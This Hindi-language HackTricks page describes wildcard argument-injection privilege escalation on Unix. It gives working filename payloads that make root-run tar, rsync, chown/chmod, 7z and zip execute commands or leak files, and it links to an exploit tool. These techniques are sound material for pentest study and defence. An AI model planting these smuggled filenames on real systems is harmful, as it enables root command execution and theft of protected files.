tip
AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks का समर्थन करें
- सदस्यता योजनाएँ देखें!
- हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमारे Twitter 🐦 @hacktricks_live** का पालन करें।**
- हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।
chown, chmod
आप यह संकेत कर सकते हैं कि आप बाकी फाइलों के लिए कौन सा फाइल मालिक और अनुमतियाँ कॉपी करना चाहते हैं
touch "--reference=/my/own/path/filename"
आप इसे https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (संयुक्त हमला) का उपयोग करके शोषण कर सकते हैं।
अधिक जानकारी के लिए https://www.exploit-db.com/papers/33930 पर जाएं।
Tar
मनमाने आदेश निष्पादित करें:
touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"
आप इसे https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (tar हमला) का उपयोग करके शोषण कर सकते हैं।
अधिक जानकारी के लिए https://www.exploit-db.com/papers/33930 पर जाएं।
Rsync
मनमाने आदेश निष्पादित करें:
Interesting rsync option from manual:
-e, --rsh=COMMAND specify the remote shell to use
--rsync-path=PROGRAM specify the rsync to run on remote machine
touch "-e sh shell.sh"
आप इसे https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (_rsync _attack) का उपयोग करके शोषण कर सकते हैं।
अधिक जानकारी के लिए https://www.exploit-db.com/papers/33930 पर जाएं।
7z
7z में --
का उपयोग करने पर भी *
से पहले (ध्यान दें कि --
का अर्थ है कि इसके बाद का इनपुट पैरामीटर के रूप में नहीं लिया जा सकता, इसलिए इस मामले में केवल फ़ाइल पथ) आप एक मनमाना त्रुटि उत्पन्न कर सकते हैं जिससे एक फ़ाइल पढ़ी जा सके, इसलिए यदि निम्नलिखित में से कोई आदेश रूट द्वारा निष्पादित किया जा रहा है:
7za a /backup/$filename.zip -t7z -snl -p$pass -- *
और आप उस फ़ोल्डर में फ़ाइलें बना सकते हैं जहाँ यह निष्पादित हो रहा है, आप फ़ाइल @root.txt
और फ़ाइल root.txt
बना सकते हैं जो उस फ़ाइल का symlink है जिसे आप पढ़ना चाहते हैं:
cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt
फिर, जब 7z निष्पादित होता है, यह root.txt
को एक फ़ाइल के रूप में मानता है जिसमें उन फ़ाइलों की सूची होती है जिन्हें इसे संकुचित करना चाहिए (यही @root.txt
के अस्तित्व का संकेत है) और जब 7z root.txt
को पढ़ता है, तो यह /file/you/want/to/read
को पढ़ेगा और चूंकि इस फ़ाइल की सामग्री फ़ाइलों की सूची नहीं है, यह एक त्रुटि फेंकेगा जो सामग्री दिखाएगी।
हैकथबॉक्स से CTF के बॉक्स के लेखों में अधिक जानकारी।
ज़िप
मनमाने आदेश निष्पादित करें:
zip name.zip files -T --unzip-command "sh -c whoami"
tip
AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks का समर्थन करें
- सदस्यता योजनाएँ देखें!
- हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमारे Twitter 🐦 @hacktricks_live** का पालन करें।**
- हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।